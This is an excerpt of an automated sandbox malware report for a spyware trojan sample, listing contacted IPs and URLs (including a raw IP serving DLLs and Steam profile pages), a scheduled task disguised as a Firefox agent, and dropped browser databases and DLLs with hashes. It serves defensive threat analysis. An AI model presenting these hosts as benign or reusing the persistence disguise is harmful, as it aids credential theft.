                  https://65.109.242.59/mozglue.dllk~ckatA304.tmp, 0000000D.00000002.3125392670.00000000009BB000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://65.109.242.59;katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28bkatA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drfalse
                  • URL Reputation: safe
                  unknown
                  https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477katA304.tmp, 0000000D.00000002.3125392670.00000000009F4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.0000000000B14000.00000004.00000020.00020000.00000000.sdmp, BGHJJD.13.drfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.pngkatA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drfalse
                  • URL Reputation: safe
                  unknown
                  https://65.109.242.59/.katA304.tmp, 0000000D.00000003.2745951442.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2699380936.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009D8000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://65.109.242.59/8katA304.tmp, 0000000D.00000003.2745951442.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2714941039.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2699380936.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009D8000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://store.steampowered.com/;katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://store.steampowered.com/about/76561199689717899[1].htm.13.drfalse
                  • URL Reputation: safe
                  unknown
                  https://community.cloudflare.steamstatic.com/katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://steamcommunity.com/my/wishlist/katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://word.office.comonexplorer.exe, 00000002.00000000.2040029267.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://65.109.242.59/sqls.dllYVjkatA304.tmp, 0000000D.00000002.3125392670.0000000000997000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drfalse
                  • URL Reputation: safe
                  unknown
                  https://community.cloudflare.steamstatic.com/public/shared/images/responsive/headekatA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IP | Domain | Country | ASN | ASN Name | Malicious
                  23.145.40.124 | unknown | Reserved | 22631 | SURFAIRWIRELESS-IN-01US | true
                  188.114.97.3 | whispedwoodmoodsksl.shop | European Union | 13335 | CLOUDFLARENETUS | true
                  104.102.42.29 | steamcommunity.com | United States | 16625 | AKAMAI-ASUS | true
                  187.143.58.5 | dbfhns.in | Mexico | 8151 | UninetSAdeCVMX | true
                  185.235.137.54 | unknown | Iran (ISLAMIC Republic Of) | 202391 | AFRARASAIR | false
                  65.109.242.59 | unknown | United States | 11022 | ALABANZA-BALTUS | false
                  186.112.12.192 | unknown | Colombia | 3816 | COLOMBIATELECOMUNICACIONESSAESPCO | true
                  91.202.233.231 | unknown | Russian Federation | 9009 | M247GB | true
                  45.129.96.86 | unknown | Estonia | 208440 | GMHOST-EE | true
                  Joe Sandbox version: 40.0.0 Tourmaline
                  Analysis ID: 1447731
                  Start date and time: 2024-05-27 00:26:04 +02:00
                  Joe Sandbox product: CloudBasic
                  Overall analysis duration: 0h 12m 11s
                  Hypervisor based Inspection enabled: false
                  Report type: full
                  Cookbook file name: default.jbs
                  Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed: 17
                  Number of new started drivers analysed: 0
                  Number of existing processes analysed: 0
                  Number of existing drivers analysed: 0
                  Number of injected processes analysed: 1
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode: default
                  Analysis stop reason: Timeout
                  Sample name: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe
                  Detection: MAL
                  Classification: mal100.troj.spyw.evad.winEXE@15/35@4/9
                  EGA Information:
                  • Successful, ratio: 75%
                  HCA Information:
                  • Successful, ratio: 95%
                  • Number of executed functions: 45
                  • Number of non-executed functions: 264
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                  • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                  • Excluded IPs from analysis (whitelisted): 52.168.117.173
                  • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target katA304.tmp, PID 1436 because there are no executed function
                  • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  • Not all processes where analyzed, report is missing behavior information
                  • Report creation exceeded maximum time and may have missing disassembly code information.
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • Report size getting too big, too many NtEnumerateKey calls found.
                  • Report size getting too big, too many NtOpenFile calls found.
                  • Report size getting too big, too many NtOpenKey calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  Time      Type             Description
                  00:27:13  Task Scheduler   Run new task: Firefox Default Browser Agent 261E3ADE99B8A132 path: C:\Users\user\AppData\Roaming\aarhevh
                  18:27:01  API Interceptor  375419x Sleep call for process: explorer.exe modified
                  18:27:24  API Interceptor  9x Sleep call for process: 21AE.exe modified
                  18:27:59  API Interceptor  1x Sleep call for process: WerFault.exe modified
                  18:28:04  API Interceptor  1x Sleep call for process: katA304.tmp modified
                                                          Process:C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Reputation:high, very likely benign file
                                                          Process:C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          File Type:ASCII text, with very long lines (1743), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):9504
                                                          Entropy (8bit):5.512408163813622
                                                          Encrypted:false
                                                          SSDEEP:192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
                                                          MD5:1191AEB8EAFD5B2D5C29DF9B62C45278
                                                          SHA1:584A8B78810AEE6008839EF3F1AC21FD5435B990
                                                          SHA-256:0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
                                                          SHA-512:86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
                                                          Malicious:false
                                                          Reputation:moderate, very likely benign file
                                                          Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                          Process:C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):98304
                                                          Entropy (8bit):0.08235737944063153
                                                          Encrypted:false
                                                          SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                          MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                          SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                          SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                          SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):32768
                                                          Entropy (8bit):0.017262956703125623
                                                          Encrypted:false
                                                          SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                          MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                          SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                          SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                          SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):159744
                                                          Entropy (8bit):0.5394293526345721
                                                          Encrypted:false
                                                          SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                          MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                          SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                          SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                          SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):5242880
                                                          Entropy (8bit):0.03859996294213402
                                                          Encrypted:false
                                                          SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
                                                          MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
                                                          SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
                                                          SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
                                                          SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):32768
                                                          Entropy (8bit):0.017262956703125623
                                                          Encrypted:false
                                                          SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                          MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                          SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                          SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                          SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):51200
                                                          Entropy (8bit):0.8746135976761988
                                                          Encrypted:false
                                                          SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                          MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                          SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                          SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                          SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.6732424250451717
                                                          Encrypted:false
                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.121297215059106
                                                          Encrypted:false
                                                          SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                          MD5:D87270D0039ED3A5A72E7082EA71E305
                                                          SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                          SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                          SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.8439810553697228
                                                          Encrypted:false
                                                          SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                          MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                          SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                          SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                          SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):155648
                                                          Entropy (8bit):0.5407252242845243
                                                          Encrypted:false
                                                          SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                          MD5:7B955D976803304F2C0505431A0CF1CF
                                                          SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                          SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                          SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):685392
                                                          Entropy (8bit):6.872871740790978
                                                          Encrypted:false
                                                          SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                          MD5:550686C0EE48C386DFCB40199BD076AC
                                                          SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                          SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                          SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Joe Sandbox View:
                                                          • Filename: QyvAWkfdLM.exe, Detection: malicious
                                                          • Filename: uBgwoHPWaf.exe, Detection: malicious
                                                          • Filename: QJqJic3hex.exe, Detection: malicious
                                                          • Filename: HeYgs7bTvy.exe, Detection: malicious
                                                          • Filename: 91713a00dd18d04d68a6b34ac3c20206f1bd38cfb72506ef32baadd380c3f993_dump.exe, Detection: malicious
                                                          • Filename: 3.exe, Detection: malicious
                                                          • Filename: 2.exe, Detection: malicious
                                                          • Filename: 4.exe, Detection: malicious
                                                          • Filename: file.exe, Detection: malicious
                                                          • Filename: file.exe, Detection: malicious
                                                          Process:C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):608080
                                                          Entropy (8bit):6.833616094889818
                                                          Encrypted:false
                                                          SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                          MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                          SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                          SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                          SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Joe Sandbox View:
                                                          • Filename: QyvAWkfdLM.exe, Detection: malicious
                                                          • Filename: QJqJic3hex.exe, Detection: malicious
                                                          • Filename: HeYgs7bTvy.exe, Detection: malicious
                                                          • Filename: 91713a00dd18d04d68a6b34ac3c20206f1bd38cfb72506ef32baadd380c3f993_dump.exe, Detection: malicious
                                                          • Filename: 3.exe, Detection: malicious
                                                          • Filename: 2.exe, Detection: malicious
                                                          • Filename: 4.exe, Detection: malicious
                                                          • Filename: file.exe, Detection: malicious
                                                          • Filename: file.exe, Detection: malicious
                                                          • Filename: CHA0VZiz8y.exe, Detection: malicious
                                                          Process:C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):450024
                                                          Entropy (8bit):6.673992339875127
                                                          Encrypted:false
                                                          SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                          MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                          SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                          SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                          SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):2046288
                                                          Entropy (8bit):6.787733948558952
                                                          Encrypted:false
                                                          SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                          MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                          SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                          SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                          SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):257872
                                                          Entropy (8bit):6.727482641240852
                                                          Encrypted:false
                                                          SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                          MD5:4E52D739C324DB8225BD9AB2695F262F
                                                          SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                          SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                          SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):80880
                                                          Entropy (8bit):6.920480786566406
                                                          Encrypted:false
                                                          SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                          MD5:A37EE36B536409056A86F50E67777DD7
                                                          SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                          SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                          SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):0.9894445865006594
                                                          Encrypted:false
                                                          SSDEEP:96:hiarp11ios6hqnFA7qnIfqBQXIDcQuc6vcEPcw30j+HbHg/8BRTf32rLOyKZzTv3:fr0oqlM0gr1XjvPF7zuiFQZ24IO85
                                                          MD5:533B0D16FBE4311CA895707DECD89876
                                                          SHA1:BA36B64FDEA472F3A62C9E22854FB5EAE4CC3EE6
                                                          SHA-256:B56E503BEE31D0B9A49DDA0AA2E82F145130ECC1E5EE427864DE40F01829E0DA
                                                          SHA-512:19C6B2264F31A37A912006175074BC024266B45372ADD7B5A4E4FF2052B47A2A70677474AD18A26622C3C138558689A2007A2453170D8B184041828F04E690EF
                                                          Malicious:false
